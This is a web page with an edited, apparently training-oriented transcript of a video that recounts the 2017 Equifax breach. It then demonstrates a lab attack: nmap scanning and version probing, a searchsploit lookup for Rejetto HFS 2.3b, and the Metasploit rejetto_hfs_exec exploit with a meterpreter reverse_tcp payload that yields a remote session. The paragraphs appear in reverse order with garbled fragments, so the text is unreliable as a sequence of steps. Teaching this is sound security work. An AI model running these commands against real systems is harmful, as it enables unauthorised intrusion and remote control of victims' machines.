![]() (4:19- 4:57) And as you can see, what happens there is I get back a session - and that session notification there really means that I’ve totally compromised a system and I have control of it. Msf exploit(windows/http/rejetto_hfs_exec) > exploit Gaining Access to the System So, with all these things in place, all that’s left for me to do is simply launch the exploit to see if the service is indeed vulnerable. Msf exploit(windows/http/rejetto_hfs_exec) > set rport 8081 Msf exploit(windows/http/rejetto_hfs_exec) > set rhost 192.168.248.246 Msf exploit(windows/http/rejetto_hfs_exec) > set lhost 192.168.248.251 Payload => windows/meterpreter/reverse_tcp Msf exploit(windows/http/rejetto_hfs_exec) > set payload windows/meterpreter/reverse_tcp Put in my target and then the port that service is running on that we discovered there. This is basically what I want the exploit to do for me. (3:28- 4:18) Now, I just set up the other requirements to run the exploit, such as a payload. Msf > use exploit/windows/http/rejetto_hfs_exec Using an exploit via Kali Linux Once that comes back, all that’s left for me to do is simply load that exploit and then see if it works against that service. Now, furthermore, in the actual Metasploit database, I can actually just search for that as well, andnd it’ll come back with results to show me that this particular exploit framework has exploits for that service. We can see that there are several that have come back. So now I’m going to go right back into my exploit tool here, which is Kali, and I’m going to search for exploits related to searchsploit rejetto And it’s all related to the server name Rejetto, which gives us more information. We can clearly see that there are several exploits out there for that specific version of that service. (2:22- 3:27) Now, we’re going to simply go out to the internet, just regular old Google here, and search for vulnerabilities related to that service. ![]() HttpFileServer httpd 2.3b How to find vulnerabilities to exploit And as you can see here, Nmap comes back and tells us that like, hey, it’s running this particular version of that service. This is basically my way of telling the Nmap tool to do a version probe, which means it’s going to dig into that service, get feedback from that service and figure out what version that service is - based on what the service responds with. So, I repeat that scan, but I narrow it down to just that port and give it a flag nmap 192.168.248.246 -p 8081 -sV What we would do next is dig a little deeper and find out what the actual service version is that’s running on each one of these individual ports. That scan simply shows me what ports are open or which ports are accepting connections on that server or on that IP. This is what we would use if you were scanning a publicly available or a public-facing server. I’m going to go ahead and scan my target nmap 192.168.248.246 (1:06- 2:21) What you see on my desktop is my typical attacker machine. As a matter of fact, we might even say it’s novice or beginner-level hacking. What you will see in this demonstration is that this hack is not very difficult to pull off. That means two months passed after they knew they were vulnerable and did nothing to fix it. There was actually a patch available for this vulnerability in March. What makes this significant is that during the congressional hearing that followed this breach, it was revealed that penetration testers had actually found this vulnerability months before.Īs for their official report, the breach happened in mid-May of 2017. (0:19- 1:05) Equifax, the largest credit reporting agency and one of the largest human intel databases in the world, was breached when a hacker discovered that there was an unpatched version of Apache Struts software running on a server in their DMZ, facing the internet. The edited transcript of Keatron’s Equifax breach walkthrough is provided below, along with a portion of the code he uses. Free Cybersecurity Training Equifax breach walkthrough and demo
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |